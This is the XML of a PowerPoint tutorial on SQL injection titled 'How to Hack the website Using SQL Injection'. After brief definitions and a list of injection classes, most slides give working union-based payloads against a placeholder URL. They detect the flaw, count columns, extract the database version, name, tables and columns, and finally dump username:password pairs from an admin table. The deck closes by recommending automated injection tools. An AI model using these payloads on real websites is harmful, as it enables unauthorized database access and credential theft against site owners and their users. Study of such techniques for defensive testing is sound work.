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3" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="279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5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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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2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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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5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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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9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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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1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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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4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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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6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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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5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7DEC-C872-4F38-9E6A-11C1C1F094F7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A65D-23DF-46C2-BA41-4B9A1D0A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4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A7DEC-C872-4F38-9E6A-11C1C1F094F7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5A65D-23DF-46C2-BA41-4B9A1D0A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0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bhattsame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site.com/index.php?id=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smtClean="0"/>
              <a:t>Sameer Bhatt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8071"/>
            <a:ext cx="10018713" cy="1078606"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find vulnerable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5070" y="1598052"/>
            <a:ext cx="10018713" cy="357925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http://www.examplesite.com/index.php?id=-5 union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select1,2,3,4,5,6,7,8,9,10—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 have put a single - in front of the id number (id=-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page with the id -5 it simply put just clears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for us. That makes it easier for us to find the data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say the numbers 3, 6 and 9 popped up on the site,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vulnerable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columns. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8222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603" y="1671079"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Version()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = have list of columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = have list of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50951"/>
            <a:ext cx="10018713" cy="1078606"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find Database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4316" y="1610931"/>
            <a:ext cx="10018713" cy="31242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http://www.examplesite.com/index.php?id=-5 union select1,2,@@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version,4,5,6,7,8,9,10—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then try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version()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26610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15344"/>
            <a:ext cx="10018713" cy="924059"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find Database </a:t>
            </a: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523" y="1894266"/>
            <a:ext cx="10018713" cy="312420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://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()) 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4,5,6,7,8,9,10—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name down so you wont forget it. Lets say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name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just extracted was named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database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5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02465"/>
            <a:ext cx="10018713" cy="975575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the Tables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1804115"/>
            <a:ext cx="10018713" cy="3124201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http://www.examplesite.com/index.php?id=-5 union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1,2,group_concat(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),4,5,6,7,8,9,10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information_schema.tables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table_schema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=database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()—</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13475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89586"/>
            <a:ext cx="10018713" cy="1271789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the Columns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738" y="1829872"/>
            <a:ext cx="10018713" cy="3124201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http://www.examplesite.com/index.php?id=-5 union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1,2,column_name,4,5,6,7,8,9,10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information_schema.columns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="admin"--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41869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463" y="325192"/>
            <a:ext cx="10018713" cy="1284667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the Content of the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462" y="1984419"/>
            <a:ext cx="10018713" cy="31242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say there are 2 columns called username and password.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what are inside of those columns we will use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://www.examplesite.com/index.php?id=-5 union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1,2,group_concat(username,0x3a,password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),4,5,6,7,8,9,10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admin-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365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28224"/>
            <a:ext cx="10018713" cy="1258910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools for SQL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20" y="2177602"/>
            <a:ext cx="10018713" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL-dumper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Havij</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many more available on internet but manual testing the best.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I suggest always do manual testing for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql-i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1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24" y="1030310"/>
            <a:ext cx="4774020" cy="46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203" y="2186233"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bhattsameer5@gmail.com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https://www.github.com/bhattsameer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter-handler: @Sameer_bhatt5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93915"/>
            <a:ext cx="10515600" cy="806852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For any query: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333" y="437883"/>
            <a:ext cx="10018713" cy="824246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is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887" y="1598052"/>
            <a:ext cx="10018713" cy="3124201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SQL: Structured Query Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Data base work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> = “value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p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11926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372" y="235365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dirty="0" smtClean="0"/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76790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077" y="763074"/>
            <a:ext cx="10018713" cy="80815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SQL Injection?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396" y="2369713"/>
            <a:ext cx="10018713" cy="3124201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 is a technique that is applied by giving malicious inputs,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result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allowing the hacker to access over the database of the Host, incase if the database operations of that web sites is allowed directly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...!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5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70646"/>
            <a:ext cx="10018713" cy="1039968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP REPORT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84" t="20254" r="4330" b="24612"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="1210614"/>
            <a:ext cx="10390010" cy="48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622" y="257579"/>
            <a:ext cx="10018713" cy="746974"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classes of SQL Injection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94158" y="876835"/>
            <a:ext cx="1001871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In-band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 is extracted using the same channel that is used to inject the SQL code.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most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forward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 of attack, in which the retrieved data is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directly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application web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1. Error Based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2. Union Based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Out-of-Band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 is retrieved using a different channel (e.g.: an email with the results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is generated and sent to the tester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)‏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there is no actual transfer of data, but the tester is able to reconstruct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sending particular requests and observing the resulting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website/DB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1. Boolean based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2. Time based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461" y="2305319"/>
            <a:ext cx="10328857" cy="1184855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Hack the website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37141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138" y="236653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b="1" dirty="0" smtClean="0"/>
              <a:t>DEMO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9561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921" y="763074"/>
            <a:ext cx="10018713" cy="1104363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Site is vulnerable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584" y="2216238"/>
            <a:ext cx="10018713" cy="31242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(Single Quote) sign with the integer value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www.examplesite.com/index.php?id=5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site shows you an error it is vulnerable to SQL, lets say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found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vulnerable site. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25599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22161"/>
            <a:ext cx="10018713" cy="1078606"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find Number of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282" y="1842751"/>
            <a:ext cx="10018713" cy="31242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http://www.examplesite.com/index.php?id=5 order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1—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keep increasing the number until we get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://www.examplesite.com/index.php?id=5 order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5—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://www.examplesite.com/index.php?id=5 order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10—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 there is 10 columns in the database. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27090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601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SQL INJECTION</vt:lpstr>
      <vt:lpstr>What is SQL?</vt:lpstr>
      <vt:lpstr>What is SQL Injection?</vt:lpstr>
      <vt:lpstr>OWASP REPORT</vt:lpstr>
      <vt:lpstr>Classes of SQL Injection</vt:lpstr>
      <vt:lpstr>How to Hack the website Using SQL Injection </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Check Site is vulnerable or Not?</vt:lpstr>
      <vt:lpstr>Find Number of Columns</vt:lpstr>
      <vt:lpstr>Find vulnerable columns</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Find Database Version</vt:lpstr>
      <vt:lpstr>Find Database Name</vt:lpstr>
      <vt:lpstr>Find the Tables Name</vt:lpstr>
      <vt:lpstr>Find the Columns Name</vt:lpstr>
      <vt:lpstr>Find the Content of the Tables</vt:lpstr>
      <vt:lpstr>Tools for SQL Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>For any query: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dell</dc:creator>
  <cp:lastModifiedBy>dell</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-28T03:19:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-02T05:59:34Z</dcterms:modified>
</cp:coreProperties>
</file>